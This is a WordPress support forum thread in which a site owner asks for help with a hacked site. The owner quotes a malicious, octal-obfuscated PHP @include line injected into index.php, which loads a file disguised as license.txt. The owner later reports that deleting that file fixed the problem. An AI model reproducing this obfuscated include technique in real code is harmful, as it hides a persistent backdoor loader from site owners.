Hacked database

  • Resolved notbanksy

    (@notbanksy)


    1 year, 8 months ago

    Hi everyone

    I’m hoping someone can help me with a hacked site, or even point me in the right direction.

    My site’s index.php has this line at the top:

    <?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>

    If I delete it, it just comes straight back. My site’s wp directory is domain.com/blog/ and the affected index.php is on the domain root. It’s not the wp index, but one I made which calls the most recent posts from the blog.

    I asked my host for support, and the agent told me the database was hacked, which is why the code in my index.php keeps reappearing.

    The strange thing is I can still access my wp installation on /blog/. So I’ve logged in, updated everything, updated the php version, and run some malware scanning plugins. So far nothing’s come up.

    Has anyone come across this hack before? Can anyone point me in the right direction to find the malicious code in the database so I can repair the site?

    Thank you.

    [edit]

    So I’ve managed to change something, but I don’t know what. I found a backup of my original index.php file, and I overwrote the broken one with it. It was immediately overwritten, but without the code shown above. My index.php file is now:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

    Thanks for looking.

    • This topic was modified 1 year, 8 months ago by notbanksy.
Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator t-p

    (@t-p)

    Carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    Thread Starter notbanksy

    (@notbanksy)

    Thanks @t-p I’m working through it now.

    Thread Starter notbanksy

    (@notbanksy)

    I’m not having any luck so far. I’m going to carry on installing malware plugins etc and learning what I can, but I had another idea. I wonder if someone can tell me if this will work.

    I’ve set up a sandbox wp install in another domain directory. Then I exported all the content from the broken site using the export feature in the dashboard, and imported it to the sandbox site.

    If I change the sandbox urls in the database, will it work if I just point my broken site to the sandbox db?

    Thread Starter notbanksy

    (@notbanksy)

    I seem to have solved it. Leaving the solution here in case anyone else finds the same issue.

    The hack didn’t come from the database after all (at least as far as I can tell.) I tracked it down to root/wp-content/images/license.txt

    Once I got rid of that file, I was able to reinstate my index.php file.

    • This reply was modified 1 year, 8 months ago by notbanksy.
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Hacked database’ is closed to new replies.